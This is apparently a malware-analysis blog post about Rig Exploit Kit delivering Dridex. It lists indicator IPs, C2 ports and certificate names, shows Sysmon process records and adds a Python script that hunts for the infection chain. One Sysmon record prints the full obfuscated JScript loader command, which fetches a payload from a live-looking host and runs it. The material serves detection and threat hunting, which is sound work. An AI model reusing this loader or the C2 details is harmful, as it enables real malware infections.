Rig Exploit Kit delivers Dridex

I have added a zipped pcap file for your analysis. The password for the zipped pcap is "infected" (all lowercase).

PCAP file of the infection traffic:
2020-02-15-Rig-EK-Dridex-pcap.zip


ASSOCIATED DOMAINS:

185.220.35.26 – cryptomoneyinside.xyz GET /zSkNkBHX?cpm_id=372833758&cpm_cost=0.0028 – Redirect to Rig EK
91.210.170.30 – GET /?MTY3NjE2&CiIe&uluBlX=abettor&dAm=callous&jVh=irreverent – Rig Exploit Kit
107.170.158.58 Port 1443 – Dridex C2
ofllpaica oungrei corp. – Dridex SSL Certificate Authority
54.38.143.246 Port 691 – Dridex C2
tamagorr sanipa eurl – Dridex SSL Certificate Authority
92.38.128.47 Port 3389 – Dridex C2
watbeq rstesus sf. – Dridex SSL Certificate Authority
109.123.107.19 Port 443 – Dridex C2
ocascotof pty. – Dridex SSL Certificate Authority


IMAGES AND DETAILS:

[Image not included in this copy: Network traffic associated with Rig Exploit Kit and Dridex C2]


SOME ASSOCIATED PROCESS BEHAVIOR FOR HUNTING ENDPOINTS:

[Sysmon Event ID 1 – Process Creation]
Image C:\Windows\System32\cmd.exe

Description Windows Command Processor
Product Microsoft® Windows® Operating System
Company Microsoft Corporation
CommandLine cMd.exe /q /c cd /d “%%temp%%” && echo function Qsdfsd(n,g){for(var c=0,s=String,d,D=”pus”+”h”,b=[],i=[],r=254+1,a=0;r+1^>a;a++)b[a]=a;for(a=0;r+1^>a;a++)c=c+b[a]+g[v](a%%g[“length”])^&r,d=b[a],b[a]=b[c],b[c]=d;for(var e=c=a=0,O=”fromC”,S=O+”harCode”;e^<n.length;e++)a=a+1^&r,c=c+b[a]^&r,d=b[a],b[a]=b[c],b[c]=d,i[D](s[S](n[v](e)/**/^^b[b[a]+b[c]^&r]));return i[u(15)](u(11))};E=”WinHTTPIRequest.5.1IGETIScripting.FileSystemObjectIWScript.ShellIADODB.StreamIeroI.exeIGe”,u=function(x){return E.split(“I”)[x]},J=ActiveXObject,W=function(v){return new J(v)};try{E+=”tTempNameIcharCodeAtIiso-8859-1IIindexOfI.dllIScriptFullNameIjoinIrunI /c I /s “;var q=W(u(3)),j=W(u(4)),s=W(u(5)),p=u(7),n=0,L=WScript[u(14)],v=u(9),m=WScript[“Ar”+”guments”];s.Type=2;c=q[u(8)]();s.Charset=u(012);s[“Open”]/**/();i=H(m);d=i[v](i[u(12)](“PE\x00\x00″)+027);s.writetext(i);if(037^<d){var z=1;c+=u(13)}else c+=p;K=”saveto”;s[K+”file”](c,2);s.Close();z^&^&(c=”Regsvr32″+p+u(18)+c);j.run(“cmd”+p+” /c “+c,0)}catch(DaSDADAD123ASD){}q.Deletefile(L);function H(g){var T=u(0),d=W(T+”.”+T+u(1));d[“SetProxy”](n);d[“Op”+”en”](u(2),g(1),n);d[“Option”](0)=g(2);d[“Send”];if(0310==d.status)return Qsdfsd(d.responseText,g(n))};>o.txt && stArT wsCripT //B //E:JScript o.txt “vcbdf45” “http://91.210.170.30/?MjkwNDk3&mYqBpCod&huoZTYZJQ=disagree&rapLdIf=border&t4gff4=gOVV0V8a__20aHnx-fgJCD_B3bYQwT-ZuSFrg40VX0x7gTeMMgzhGBuGlRn-0tV1wW4A0QmKnOFqb58EYwV0UC&ymYRQIsGx=disagree&ojZpyKs=callous&typeQxUD=filly&cKVHt=callous&DJBQO=dinamic&CBor=callous&EbTEVRE=accelerator&MdoZbgPK=border&hfaMh=community&NuTNgaHy=irreverent&ffdgdfs=xHbQMrfYbRfFFYrfKPLEUKxEMUfWA06KwYiZhanVF5exFD_Gpbv1FxTspVudCFWEmvtvdLQHIwWh1UPASwximI&iRdiyBlQUNTkwNDEx” “¤”
CurrentDirectory C:\Users\Jake\Desktop\
User Jake-PC\Jake
ParentImage C:\Program Files\Internet Explorer\iexplore.exe
ParentCommandLine "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:984 CREDAT:144385 /prefetch:2

[Sysmon Event ID 1 – Process Creation]
Image C:\Users\Jake\AppData\Local\Temp\rad5BB70.tmp.exe
FileVersion 1.0.0.5
Description Advanced SystemCare MonitorDisk
Product Advanced SystemCare
Company IObit
CommandLine rad5BB70.tmp.exe
CurrentDirectory C:\Users\Jake\AppData\Local\Temp\
User Jake-PC\Jake
MALWARE Hashes MD5=D7A59D318F9F9C9CD81CF84A4746364E,SHA256=9ABA3BF208092EFBC3B9E3FDA8C276319B369D3C9F1E6545EEB05D698B64430E
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine "C:\Windows\System32\cmd.exe" /c rad5BB70.tmp.exe

[Sysmon Event ID 3 – Network Connection]
Image C:\Users\Jake\AppData\Local\Temp\rad5BB70.tmp.exe
User Jake-PC\Jake
Protocol tcp
SourceIp 192.168.2.8
DestinationIp 107.170.158.58
DestinationHostname
DestinationPort 1443
DestinationPortName

[Sysmon Event ID 3 – Network Connection]
Image C:\Users\Jake\AppData\Local\Temp\rad80D4A.tmp.exe
User Jake-PC\Jake
Protocol tcp
SourceIp 192.168.2.8
DestinationIp 92.38.128.47
DestinationHostname
DestinationPort 3389
DestinationPortName ms-wbt-server
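
The Sysmon records above describe a chain a hunter can turn into rules: a browser spawning cmd.exe that writes JScript into %temp% and starts wscript with //E:JScript, a rad?????.tmp.exe dropped in the user's Temp folder (the name comes from FileSystemObject.GetTempName, the "tTempName" string in the loader), and that Temp executable opening outbound connections on unusual ports. The following is an added example, not part of the original post; the event records are constructed from the fields shown above with the obfuscated script body abbreviated, and the field names follow Sysmon's naming.

```python
import re

# Constructed Sysmon-style records (field subset), modelled on the events above.
# Benign controls are included so the rules can be checked for false positives.
EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cMd.exe /q /c cd /d "%%temp%%" && echo function Qsdfsd(n,g){...}>o.txt '
                    r'&& stArT wsCripT //B //E:JScript o.txt "vcbdf45" "http://91.210.170.30/?MjkwNDk3"',
     "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe"},
    {"EventID": 1, "Image": r"C:\Users\Jake\AppData\Local\Temp\rad5BB70.tmp.exe",
     "CommandLine": "rad5BB70.tmp.exe", "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 3, "Image": r"C:\Users\Jake\AppData\Local\Temp\rad5BB70.tmp.exe",
     "DestinationIp": "107.170.158.58", "DestinationPort": 1443},
    {"EventID": 3, "Image": r"C:\Users\Jake\AppData\Local\Temp\rad80D4A.tmp.exe",
     "DestinationIp": "92.38.128.47", "DestinationPort": 3389},
    # benign controls: an interactive admin shell and a browser doing plain HTTPS
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c dir",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 3, "Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
]

BROWSERS = ("iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe")
TEMP_DIR = re.compile(r"\\appdata\\local\\temp\\", re.I)
# FileSystemObject.GetTempName() returns rad + 5 hex digits + .tmp; the loader appends .exe or .dll
RAD_TMP = re.compile(r"\\rad[0-9a-f]{5}\.tmp\.(exe|dll)$", re.I)


def hunt(events):
    """Return (rule_name, event_index) pairs for records matching the Rig EK -> Dridex chain."""
    hits = []
    for i, ev in enumerate(events):
        image = ev.get("Image", "")
        if ev.get("EventID") == 1:
            # lower-case everything: the loader deliberately mixes case (cMd.exe, wsCripT)
            cmd = ev.get("CommandLine", "").lower()
            parent = ev.get("ParentImage", "").lower()
            if (image.lower().endswith("\\cmd.exe") and parent.endswith(BROWSERS)
                    and "wscript" in cmd and "//e:jscript" in cmd and "%temp%" in cmd):
                hits.append(("browser_spawns_cmd_wscript_jscript", i))
            if RAD_TMP.search(image):
                hits.append(("temp_rad_tmp_executable", i))
        elif ev.get("EventID") == 3 and TEMP_DIR.search(image):
            # any outbound connection from a binary running out of Temp is worth a look;
            # here the ports (1443, 3389) are Dridex C2, not real RDP or HTTPS
            hits.append(("temp_executable_network_connection", i))
    return hits
```

Run against a real Sysmon export, the port-3389 hit is the one most likely to be dismissed as RDP noise, which is why the rule keys on the image path rather than the port.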

VirusTotal Link:
https://www.virustotal.com/gui/file-analysis/ZDdhNTlkMzE4ZjlmOWM5Y2Q4MWNmODRhNDc0NjM2NGU6MTU4MTgwODU3Ng==/detection